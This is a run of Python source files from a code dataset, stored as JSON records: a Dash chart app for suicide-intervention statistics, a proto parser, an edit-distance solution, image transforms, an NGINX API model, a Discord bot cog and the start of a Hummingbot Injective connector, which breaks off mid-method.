Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Signs with Emergency Contact\")\nbar5 = px.bar(data,\n x=\"CCTV\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"CCTV\")\nbar6 = px.bar(data,\n x=\"Safety Staff\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Safety Staff\")\nbar7 = px.bar(data,\n x=\"Blue Lights\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Blue Lights\")\n\npie1 = px.pie(data,\n title=\"Yearly Pre-Intervention Suicides by Location\",\n names=\"Location Type\",\n values=\"Yearly Pre-Intervention Rate\")\npie2 = px.pie(data,\n title=\"Yearly Post-Intervention Suicides by Location\",\n names=\"Location Type\",\n values=\"Yearly Post Intervention Rate\")\npie3 = px.pie(data,\n title=\"Yearly Pre-Intervention Suicides by Method\",\n names=\"Suicide Method\",\n values=\"Yearly Pre-Intervention Rate\")\npie4 = px.pie(data,\n title=\"Yearly Post-Intervention Suicides by Method\",\n names=\"Suicide Method\",\n 
values=\"Yearly Post Intervention Rate\")\n\n\napp.layout = html.Div(children=[\n html.Div(\n children=[\n html.Div(\n children=[ \n dcc.Graph(\n id=\"main-graph\",\n figure=fig\n ),\n ],\n className=\"nine columns\"\n ),\n html.Div(\n children=[\n html.Br(),\n html.Br(),\n html.Label(\"Select Feature\"),\n dcc.Dropdown(\n id=\"feature-select\",\n options=[\n {'label':x, 'value': x} for x in features\n ],\n value=features[1],\n clearable=False\n ),\n html.Br(),\n html.Label(\"Select Graph type\"),\n dcc.Dropdown(\n id=\"graph-select\",\n options=[\n {'label':'Histogram', 'value': 'hist'},\n {'label':'Scatterplot', 'value': 'scatter'},\n {'label':'Boxplot', 'value':'box'}\n ],\n value='hist',\n clearable=False\n ),\n ],\n className=\"three columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Hr(),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie1\",\n figure=pie1\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie2\",\n figure=pie2\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie3\",\n figure=pie3\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie4\",\n figure=pie4\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Hr(),\n dcc.Graph(\n id=\"bar1\",\n figure=bar1\n ),\n dcc.Graph(\n id=\"bar2\",\n figure=bar2\n ),\n html.Hr(),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar3\",\n figure=bar3\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar4\",\n figure=bar4\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar5\",\n figure=bar5\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar6\",\n figure=bar6\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar7\",\n figure=bar7\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n])\n\n\n@app.callback(\n Output(\"main-graph\",\"figure\"),\n [Input(\"feature-select\", \"value\"), Input(\"graph-select\",\"value\")]\n)\ndef UpdateGraph(feature, graph):\n if graph == 'hist':\n fig2 = px.histogram(data, x=feature)\n elif graph == 'scatter':\n fig2 = px.scatter(data, x=feature)\n else:\n fig2 = px.box(data, x=feature)\n fig2.update_layout(\n title=\"Graph: \"+feature\n )\n return fig2","sub_path":"interface/main/dash_apps/visuals.py","file_name":"visuals.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"369310226","text":"import sys\nimport os\nimport re\nimport string\n\ndef base_dir():\n path = sys.argv[0]\n path = os.path.dirname(os.path.abspath(path))\n (base, _) = os.path.split(path)\n return base\n\ndef proto_dir():\n baseDir = base_dir()\n return os.path.join(baseDir, \"proto\")\n\ndef script_dir():\n baseDir = base_dir()\n return os.path.join(baseDir, \"script\")\n\ndef target_dir(target):\n baseDir = base_dir()\n return os.path.join(baseDir, \"target\", target)\n\ndef is_comment(str):\n return re.match(\"^\\s*(\\/+|%+)\", str)\n\ndef is_blank_line(str):\n return len(string.strip(str)) == 0\n\ndef is_message_begin(str):\n return re.match(\"^\\s*message\", str)\n\ndef is_message_end(str):\n return 
re.match(\"^\\s*end\", str)\n\ndef ensure_dir(dir):\n if not os.path.exists(dir):\n os.makedirs(dir)\n\ndef get_all_proto():\n files = []\n protoDir = proto_dir()\n for f in os.listdir(protoDir):\n # print(f)\n if re.search(\"\\.proto$\", f):\n files.append(os.path.join(protoDir, f))\n\n return files\n\nclass myerror(BaseException):\n def __init__(self, line, msg):\n self.line = line\n self.msg = msg\n\n def __str__(self):\n return \"[line: %s] %s\" % (self.line, self.msg)\n\nclass helper(object):\n def __init__(self, handler):\n self.curline = 0\n self.curfile = \"\"\n self.handler = handler\n self.initTmpdata()\n\n def initTmpdata(self):\n self.isBegin = False\n self.isEnd = False\n self.tmpDict = {\"head\":False, \"body\": []}\n\n def parse_head(self, str):\n s = string.split(str, \" \")\n return string.rstrip(s[1], \"\\n\\0\")\n\n def parse_body(self, str):\n arr = string.split(str, \";\")\n if not arr[0]:\n raise myerror(self.curline, \"message define error\")\n arr = string.split(string.strip(arr[0]))\n arrlen = len(arr)\n if arrlen >3 or arrlen < 2:\n raise myerror(self.curline, \"message define error\")\n if arrlen == 3 and arr[1] != \"*\":\n raise myerror(self.curline, \"message define error\")\n\n body = {}\n if arrlen == 3:\n body[\"type\"] = arr[0]\n body[\"isarray\"] = True\n body[\"name\"] = arr[2]\n elif arrlen == 2:\n body[\"name\"] = arr[1]\n if arr[0][-1] == \"*\":\n body[\"isarray\"] = True\n else:\n body[\"isarray\"] = False\n\n body[\"type\"] = string.rstrip(arr[0], \"*\")\n\n return body\n\n def set_line(self, line):\n self.curline = self.curline + 1\n line = string.strip(line, \" \\0\")\n if not is_comment(line) and not is_blank_line(line):\n self.isBegin = is_message_begin(line)\n self.isEnd = is_message_end(line)\n if self.isBegin:\n head = self.parse_head(line)\n if self.tmpDict[\"head\"] or not head:\n raise myerror(self.curline, \"invalid message head\")\n self.tmpDict[\"head\"] = head\n elif self.isEnd:\n if not self.tmpDict[\"head\"]:\n raise myerror(self.curline, \"message begin and end no match\")\n ## get a message\n self.handler(self.tmpDict)\n self.initTmpdata()\n else:\n ## body define\n if not self.tmpDict[\"head\"]:\n raise myerror(self.curline, \"miss message begin\")\n\n body = self.parse_body(line)\n self.tmpDict[\"body\"].append(body)\n\n\n\n\n","sub_path":"script/parse_util.py","file_name":"parse_util.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"207640838","text":"\"\"\"\nProblem:\n\nThe edit distance between two strings refers to the minimum number of character insertions, deletions, and substitutions required to change one string to the other.\nGiven two strings, compute the edit distance between them.\n\nExample:\n\nInput = “kitten”, “sitting”\nOutput = 3\n\"\"\"\n\n# FUNCTION TO PERFORM THE OPERATION\ndef string_distance(str1, str2):\n # if the strings are same, the distance between the strings is 0 [BASE CASE FOR RECURSION]\n if str1 == str2:\n return 0\n # if str1 is an empty string, distance is length of str2 (len(str2) characters have to be inserted) [BASE CASE FOR RECURSION]\n elif not str1:\n return len(str2)\n # if str2 is an empty string, distance is length of str1 (len(str1) characters have to be inserted) [BASE CASE FOR RECURSION]\n elif not str2:\n return len(str1)\n\n # if the 1st character are the same for both strings\n if str1[0] == str2[0]:\n return string_distance(str1[1:], str2[1:])\n\n # if the 1st character are 
different, we choose the minimum distance for 1st character deletion, addition and modifying the character + 1 (due to the change in the character)\n return 1 + min(\n string_distance(str1[1:], str2), # deletion from str1\n string_distance(str1, str2[1:]), # addition to str1\n string_distance(str1[1:], str2[1:]),\n ) # modification to str1\n\n\n# DRIVER CODE\nprint(string_distance(\"kitten\", \"sitting\"))\n","sub_path":"Solutions/031.py","file_name":"031.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"645881988","text":"try:\n import accimage\nexcept ImportError:\n accimage = None\nimport numpy as np\nimport tensorflow as tf\n\nfrom ._utils import _is_pil_image\nfrom ._utils import _is_numpy_image\nfrom ._utils import _is_tensor_image\nfrom ._utils import _get_image_dimension\nfrom .transformer import Transformer\n\nclass ImageToTensor(Transformer):\n \"\"\"Convert an Image to tensor.\n \"\"\"\n def __call__(self, value):\n if not(_is_pil_image(value) or _is_numpy_image(value)):\n format_string = 'image should be PIL Image or ndarray, but got {}.'\n raise TypeError(format_string.format(type(value)))\n\n if isinstance(value, np.ndarray):\n if value.ndim == 2:\n value = value[:, :, None]\n\n image = tf.convert_to_tensor(value)\n return image\n\n if accimage is not None and isinstance(value, accimage.Image):\n nppic = np.zeros([value.channels, value.height, value.width],\n dtype=np.float32)\n value.copyto(nppic)\n return tf.convert_to_tensor(nppic)\n\n # handle PIL Image\n if value.mode == 'I':\n image = tf.convert_to_tensor(value, dtype=tf.int32)\n elif value.mode == 'I;16':\n image = tf.convert_to_tensor(value, dtype=tf.int16)\n elif value.mode == 'F':\n image = tf.convert_to_tensor(value, dtype=tf.float32)\n elif value.mode == '1':\n image = 255 * tf.convert_to_tensor(value, dtype=tf.uint8)\n else:\n image = tf.convert_to_tensor(value, dtype=tf.uint8)\n\n # PIL image mode: L, LA, P, I, F, RGB, YCbCr, RGBA, CMYK\n if value.mode == 'YCbCr':\n nchannel = 3\n elif value.mode == 'I;16':\n nchannel = 1\n else:\n nchannel = len(value.mode)\n\n image = tf.reshape(image, [value.size[1], value.size[0], nchannel])\n # Convert the value format from HWC to CHW.\n image = tf.transpose(image, [2, 0, 1])\n return image\n\nclass ResizeImages(Transformer):\n \"\"\"Resize an image.\n \"\"\"\n def __init__(self, size=(224, 224),\n method=tf.image.ResizeMethod.BILINEAR,\n align_corners=False):\n self._size = size\n self._method = method\n self._align_corners = align_corners\n\n def __call__(self, value):\n if isinstance(value, np.ndarray):\n if value.ndim == 3:\n value = np.expand_dims(value, 0)\n elif value.ndim != 4:\n raise ValueError('The dimension must be 3 or 4.')\n elif not isinstance(value, (tuple, list)):\n raise TypeError('The input must be list, tuple or numpy array.')\n\n value = [tf.convert_to_tensor(v) for v in value]\n\n images = []\n size = self._size\n _, _, channels = _get_image_dimension(value[0])\n\n for v in value:\n if not _is_tensor_image(v):\n raise ValueError('The value is not an image.')\n\n image = tf.expand_dims(v, 0)\n image = tf.image.resize(image, size,\n self._method,\n self._align_corners)\n image = tf.reshape(image, tf.stack([size[0], size[1], channels]))\n images.append(image)\n return 
images\n","sub_path":"imitation/transform/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"18515339","text":"# coding: utf-8\n\n\"\"\"\n NGINX Plus REST API\n\n NGINX Plus REST [API](https://nginx.org/en/docs/http/ngx_http_api_module.html) provides access to NGINX Plus status information, on-the-fly configuration of upstream servers and key-value pairs management for [http](https://nginx.org/en/docs/http/ngx_http_keyval_module.html) and [stream](https://nginx.org/en/docs/stream/ngx_stream_keyval_module.html). # noqa: E501\n\n OpenAPI spec version: 2.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom nginxplus.models.nginx_stream_server_zone_sessions import NginxStreamServerZoneSessions # noqa: F401,E501\n\n\nclass NginxStreamServerZone(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'processing': 'int',\n 'connections': 'int',\n 'sessions': 'NginxStreamServerZoneSessions',\n 'discarded': 'int',\n 'received': 'int',\n 'sent': 'int'\n }\n\n attribute_map = {\n 'processing': 'processing',\n 'connections': 'connections',\n 'sessions': 'sessions',\n 'discarded': 'discarded',\n 'received': 'received',\n 'sent': 'sent'\n }\n\n def __init__(self, processing=None, connections=None, sessions=None, discarded=None, received=None, sent=None): # noqa: E501\n \"\"\"NginxStreamServerZone - a model defined in Swagger\"\"\" # noqa: E501\n\n self._processing = None\n self._connections = None\n self._sessions = None\n self._discarded = None\n self._received = None\n self._sent = None\n self.discriminator = None\n\n if processing is not None:\n self.processing = processing\n if connections is not None:\n self.connections = connections\n if sessions is not None:\n self.sessions = sessions\n if discarded is not None:\n self.discarded = discarded\n if received is not None:\n self.received = received\n if sent is not None:\n self.sent = sent\n\n @property\n def processing(self):\n \"\"\"Gets the processing of this NginxStreamServerZone. # noqa: E501\n\n The number of client connections that are currently being processed. # noqa: E501\n\n :return: The processing of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._processing\n\n @processing.setter\n def processing(self, processing):\n \"\"\"Sets the processing of this NginxStreamServerZone.\n\n The number of client connections that are currently being processed. # noqa: E501\n\n :param processing: The processing of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._processing = processing\n\n @property\n def connections(self):\n \"\"\"Gets the connections of this NginxStreamServerZone. # noqa: E501\n\n The total number of connections accepted from clients. # noqa: E501\n\n :return: The connections of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._connections\n\n @connections.setter\n def connections(self, connections):\n \"\"\"Sets the connections of this NginxStreamServerZone.\n\n The total number of connections accepted from clients. 
# noqa: E501\n\n :param connections: The connections of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._connections = connections\n\n @property\n def sessions(self):\n \"\"\"Gets the sessions of this NginxStreamServerZone. # noqa: E501\n\n\n :return: The sessions of this NginxStreamServerZone. # noqa: E501\n :rtype: NginxStreamServerZoneSessions\n \"\"\"\n return self._sessions\n\n @sessions.setter\n def sessions(self, sessions):\n \"\"\"Sets the sessions of this NginxStreamServerZone.\n\n\n :param sessions: The sessions of this NginxStreamServerZone. # noqa: E501\n :type: NginxStreamServerZoneSessions\n \"\"\"\n\n self._sessions = sessions\n\n @property\n def discarded(self):\n \"\"\"Gets the discarded of this NginxStreamServerZone. # noqa: E501\n\n The total number of connections completed without creating a session. # noqa: E501\n\n :return: The discarded of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._discarded\n\n @discarded.setter\n def discarded(self, discarded):\n \"\"\"Sets the discarded of this NginxStreamServerZone.\n\n The total number of connections completed without creating a session. # noqa: E501\n\n :param discarded: The discarded of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._discarded = discarded\n\n @property\n def received(self):\n \"\"\"Gets the received of this NginxStreamServerZone. # noqa: E501\n\n The total number of bytes received from clients. # noqa: E501\n\n :return: The received of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._received\n\n @received.setter\n def received(self, received):\n \"\"\"Sets the received of this NginxStreamServerZone.\n\n The total number of bytes received from clients. # noqa: E501\n\n :param received: The received of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._received = received\n\n @property\n def sent(self):\n \"\"\"Gets the sent of this NginxStreamServerZone. # noqa: E501\n\n The total number of bytes sent to clients. # noqa: E501\n\n :return: The sent of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._sent\n\n @sent.setter\n def sent(self, sent):\n \"\"\"Sets the sent of this NginxStreamServerZone.\n\n The total number of bytes sent to clients. # noqa: E501\n\n :param sent: The sent of this NginxStreamServerZone. 
# noqa: E501\n :type: int\n \"\"\"\n\n self._sent = sent\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, NginxStreamServerZone):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"nginxplus/models/nginx_stream_server_zone.py","file_name":"nginx_stream_server_zone.py","file_ext":"py","file_size_in_byte":7787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"275622569","text":"from phase_IV.TFL_manager import TFL\nimport matplotlib.pyplot as plt\n\n\nclass Controller:\n\n def __init__(self):\n with open(\"data/pls_files/play_list.pls\", \"r+\") as data:\n read_lines = data.readlines()\n image_path = [line[:-1] for line in read_lines]\n self.path_images = image_path[2:]\n self.tfl_manager = TFL(image_path[0], int(image_path[1]), int(image_path[1])+len(image_path[2:])-1)\n self.first_frame = image_path[1]\n\n def run(self) -> None:\n for i in range(len(self.path_images)):\n self.tfl_manager.run_product(self.path_images[i], i)\n plt.show(block=True)\n\n\ndef main():\n controller = Controller()\n controller.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"phase_IV/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"71659729","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nfrom datetime import datetime\nimport os\nimport sqlite3\n\ndef is_admin():\n def predicate(ctx):\n conn = sqlite3.connect(os.getcwd() + '/servers/' + str(ctx.guild.id) + '/Server_Database.db')\n c = conn.cursor()\n c.execute(\"SELECT * FROM admin_table\")\n admins = c.fetchall()\n for admin in admins:\n if (ctx.author.id in admin) : return True\n return False\n return commands.check(predicate)\n\nclass Weekly_Reset(commands.Cog):\n def __init__(self,bot):\n self.bot = bot\n self.join_us_msg = '<:Crypt_Keeper:694324654227062825> Come Visit The Testing Server For Any Questions/Help : [Server_Link](https://discord.gg/weXYh8D)'\n self.colour = (0x96110F)\n\n # // -- A Function To Print Information In The Testing Servers Command Chat -- //\n async def log_command(self,ctx,func_name):\n try:\n # // -- Creating and Embed -- //\n log_embed = discord.Embed(\n title = ('Crypt Keeper Command Log'),\n description = (\"Command : {}\\nContent : `{}`\".format(func_name,ctx.message.content)),\n colour = self.colour\n )\n # // -- Giving the Embed Fields -- //\n log_embed.add_field(name = \"Guild\", value = \"{}\".format(ctx.guild), inline = 
False)\n log_embed.add_field(name = \"Channel\", value = \"{}\".format(ctx.channel), inline = False)\n log_embed.add_field(name = \"Author\", value = \"{}\".format(ctx.author), inline = False)\n log_embed.add_field(name = \"Time\", value = \"{}\".format(datetime.now()), inline = False)\n # // -- Sending the Embed -- //\n await self.bot.get_channel(694247048396013698).send(embed = log_embed)\n except Exception as error:\n # // -- Printing What Went Wrong to the Shell -- // \n print(\"Error Occured : [{}]\".format(error))\n return\n # // -- A Function To Print Information In The Testing Server Error Chat -- //\n async def error_log_command(self,ctx,func_name,error):\n try:\n # // -- Creating and Embed -- //\n log_embed = discord.Embed(\n title = ('Crypt Keeper Error Log'),\n description = (\"Command : {}\\nContent : `{}`\\nError : ```{}```\".format(func_name,ctx.message.content,error)),\n colour = self.colour\n )\n # // -- Giving the Embed Fields -- //\n log_embed.add_field(name = \"Guild\", value = \"{}\".format(ctx.guild), inline = False)\n log_embed.add_field(name = \"Channel\", value = \"{}\".format(ctx.channel), inline = False)\n log_embed.add_field(name = \"Author\", value = \"{}\".format(ctx.author), inline = False)\n log_embed.add_field(name = \"Time\", value = \"{}\".format(datetime.now()), inline = False)\n # // -- Sending the Embed -- //\n await self.bot.get_channel(696027589827100792).send(embed = log_embed)\n except Exception as error:\n # // -- Printing What Went Wrong to the Shell -- // \n print(\"Error Occured : [{}]\".format(error))\n return\n\n @commands.command(name = 'weekly_reset',\n aliases = ['wklyrst'])\n @is_admin()\n async def weekly_reset(self,ctx):\n await self.log_command(ctx,'weekly_reset')\n try:\n c_msg = ''\n conn = sqlite3.connect(os.getcwd() + '/servers/' + str(ctx.guild.id) + '/Server_Database.db')\n c = conn.cursor()\n c.execute(\"SELECT room_ID, room_type, reset_msg_ID, pin_reset FROM rp_room_table\")\n categories = c.fetchall()\n c.execute(\"SELECT * FROM reset_msg_table\")\n all_table_msgs = c.fetchall()\n for rp_room in categories:\n for reset_messages in all_table_msgs:\n if rp_room[2] == reset_messages[0] : c_msg = reset_messages[2]\n c_embed = discord.Embed(title = \"<:Crypt_Keeper:694324654227062825> The Channel Has Been Reset <:Crypt_Keeper:694324654227062825>\",\n description = (c_msg),\n colour = self.colour\n )\n if (rp_room[1] == 'CATEGORY'):\n for channel in self.bot.get_channel(rp_room[0]).channels:\n c_pin = await channel.send( embed = c_embed)\n print(rp_room[0],rp_room[1],rp_room[2],rp_room[3])\n if rp_room[3] == \"NO\":\n continue\n await c_pin.pin()\n else :\n c_pin = await self.bot.get_channel(rp_room[0]).send(embed = c_embed)\n if rp_room[3] == \"NO\":\n continue\n await c_pin.pin()\n except Exception as error:\n # // -- Log The Commands Use -- //\n await self.error_log_command(ctx,'weekly_reset',error)\n c_embed = discord.Embed(title = \"An Error Occured\",\n description = 'Error : {}\\n---\\n{}'.format(error,self.join_us_msg),\n colour = self.colour\n )\n c_file = discord.File(\"resources/Crypt_Keeper.gif\", filename=\"Crypt_Keeper.gif\")\n c_embed.set_thumbnail(url = \"attachment://Crypt_Keeper.gif\") \n await ctx.send(file = c_file, embed = c_embed)\n return\n\ndef setup(bot):\n bot.add_cog(Weekly_Reset(bot))\n","sub_path":"Weekly_Reset.py","file_name":"Weekly_Reset.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} 
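The Weekly_Reset cog above gates its command with a custom discord.py commands.check whose predicate reads the caller's ID out of a per-guild SQLite database (servers/<guild id>/Server_Database.db). Below is a minimal sketch of that same pattern, factored into a reusable check factory so other cogs could gate on other tables; the parameterized table name and the member_of name are illustrative assumptions, not part of the cog above.

import os
import sqlite3

from discord.ext import commands


def member_of(table_name):
    # Generalized form of the is_admin() predicate used by the cog above:
    # the command runs only if the author's ID appears somewhere in the
    # given table of the invoking guild's database. The table name is a
    # hypothetical parameter for illustration; never interpolate untrusted
    # input here, since table names cannot be bound as SQL parameters.
    def predicate(ctx):
        db_path = os.path.join(os.getcwd(), 'servers', str(ctx.guild.id), 'Server_Database.db')
        conn = sqlite3.connect(db_path)
        try:
            rows = conn.execute("SELECT * FROM {}".format(table_name)).fetchall()
            # Mirrors the cog's membership test: any row containing the ID passes.
            return any(ctx.author.id in row for row in rows)
        finally:
            conn.close()
    return commands.check(predicate)

A command would then opt in with @member_of('admin_table'), which keeps the SQL lookup out of the command body and lets a denied call surface as a normal discord.py CheckFailure instead of an ad-hoc early return.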
+{"seq_id":"167196720","text":"from util.decorators import requires\n\n\n@requires(\"git\")\ndef run(self, *arg):\n \"\"\"\n Print out a list of branches for this repository.\n \"\"\"\n branches = self.git.branches\n for branch in branches:\n self.console.blue(branch)\n","sub_path":"commands/git/branches.py","file_name":"branches.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"29442174","text":"import asyncio\nfrom collections import defaultdict\nfrom decimal import Decimal\nfrom enum import Enum\nfrom typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Union\n\nfrom async_timeout import timeout\n\nfrom hummingbot.connector.client_order_tracker import ClientOrderTracker\nfrom hummingbot.connector.constants import s_decimal_NaN\nfrom hummingbot.connector.exchange.injective_v2 import (\n injective_constants as CONSTANTS,\n injective_v2_web_utils as web_utils,\n)\nfrom hummingbot.connector.exchange.injective_v2.injective_events import InjectiveEvent\nfrom hummingbot.connector.exchange.injective_v2.injective_v2_api_order_book_data_source import (\n InjectiveV2APIOrderBookDataSource,\n)\nfrom hummingbot.connector.exchange.injective_v2.injective_v2_utils import InjectiveConfigMap\nfrom hummingbot.connector.exchange_py_base import ExchangePyBase\nfrom hummingbot.connector.gateway.gateway_in_flight_order import GatewayInFlightOrder\nfrom hummingbot.connector.gateway.gateway_order_tracker import GatewayOrderTracker\nfrom hummingbot.connector.trading_rule import TradingRule\nfrom hummingbot.connector.utils import combine_to_hb_trading_pair, get_new_client_order_id\nfrom hummingbot.core.api_throttler.data_types import RateLimit\nfrom hummingbot.core.data_type.cancellation_result import CancellationResult\nfrom hummingbot.core.data_type.common import OrderType, TradeType\nfrom hummingbot.core.data_type.in_flight_order import OrderState, OrderUpdate, TradeUpdate\nfrom hummingbot.core.data_type.limit_order import LimitOrder\nfrom hummingbot.core.data_type.market_order import MarketOrder\nfrom hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource\nfrom hummingbot.core.data_type.trade_fee import TradeFeeBase, TradeFeeSchema\nfrom hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource\nfrom hummingbot.core.event.event_forwarder import EventForwarder\nfrom hummingbot.core.event.events import AccountEvent, BalanceUpdateEvent, MarketEvent\nfrom hummingbot.core.network_iterator import NetworkStatus\nfrom hummingbot.core.utils.async_utils import safe_ensure_future\nfrom hummingbot.core.utils.estimate_fee import build_trade_fee\nfrom hummingbot.core.web_assistant.auth import AuthBase\nfrom hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory\n\nif TYPE_CHECKING:\n from hummingbot.client.config.config_helpers import ClientConfigAdapter\n\n\nclass InjectiveV2Exchange(ExchangePyBase):\n web_utils = web_utils\n\n def __init__(\n self,\n client_config_map: \"ClientConfigAdapter\",\n connector_configuration: InjectiveConfigMap,\n trading_pairs: Optional[List[str]] = None,\n trading_required: bool = True,\n **kwargs,\n ):\n self._orders_processing_delta_time = 0.5\n\n self._trading_required = trading_required\n self._trading_pairs = trading_pairs\n self._data_source = connector_configuration.create_data_source()\n\n super().__init__(client_config_map=client_config_map)\n 
self._data_source.configure_throttler(throttler=self._throttler)\n self._forwarders = []\n self._configure_event_forwarders()\n self._latest_polled_order_fill_time: float = self._time()\n self._orders_transactions_check_task: Optional[asyncio.Task] = None\n self._last_received_message_timestamp = 0\n self._orders_queued_to_create: List[GatewayInFlightOrder] = []\n self._orders_queued_to_cancel: List[GatewayInFlightOrder] = []\n\n self._orders_transactions_check_task = None\n self._queued_orders_task = None\n self._all_trading_events_queue = asyncio.Queue()\n\n @property\n def name(self) -> str:\n return CONSTANTS.EXCHANGE_NAME\n\n @property\n def authenticator(self) -> AuthBase:\n return None\n\n @property\n def rate_limits_rules(self) -> List[RateLimit]:\n return CONSTANTS.RATE_LIMITS\n\n @property\n def domain(self) -> str:\n return self._data_source.network_name\n\n @property\n def client_order_id_max_length(self) -> int:\n return None\n\n @property\n def client_order_id_prefix(self) -> str:\n return \"\"\n\n @property\n def trading_rules_request_path(self) -> str:\n raise NotImplementedError\n\n @property\n def trading_pairs_request_path(self) -> str:\n raise NotImplementedError\n\n @property\n def check_network_request_path(self) -> str:\n raise NotImplementedError\n\n @property\n def trading_pairs(self) -> List[str]:\n return self._trading_pairs\n\n @property\n def is_cancel_request_in_exchange_synchronous(self) -> bool:\n return False\n\n @property\n def is_trading_required(self) -> bool:\n return self._trading_required\n\n @property\n def status_dict(self) -> Dict[str, bool]:\n status = super().status_dict\n status[\"data_source_initialized\"] = self._data_source.is_started()\n return status\n\n async def start_network(self):\n await super().start_network()\n\n market_ids = [\n await self.exchange_symbol_associated_to_pair(trading_pair=trading_pair)\n for trading_pair in self._trading_pairs\n ]\n await self._data_source.start(market_ids=market_ids)\n\n if self.is_trading_required:\n self._orders_transactions_check_task = safe_ensure_future(self._check_orders_transactions())\n self._queued_orders_task = safe_ensure_future(self._process_queued_orders())\n\n async def stop_network(self):\n \"\"\"\n This function is executed when the connector is stopped. 
It performs a general cleanup and stops all background\n        tasks that require the connection with the exchange to work.\n        \"\"\"\n        await super().stop_network()\n        await self._data_source.stop()\n        self._forwarders = []\n        if self._orders_transactions_check_task is not None:\n            self._orders_transactions_check_task.cancel()\n            self._orders_transactions_check_task = None\n        if self._queued_orders_task is not None:\n            self._queued_orders_task.cancel()\n            self._queued_orders_task = None\n\n    def supported_order_types(self) -> List[OrderType]:\n        return self._data_source.supported_order_types()\n\n    def start_tracking_order(\n        self,\n        order_id: str,\n        exchange_order_id: Optional[str],\n        trading_pair: str,\n        trade_type: TradeType,\n        price: Decimal,\n        amount: Decimal,\n        order_type: OrderType,\n        **kwargs,\n    ):\n        self._order_tracker.start_tracking_order(\n            GatewayInFlightOrder(\n                client_order_id=order_id,\n                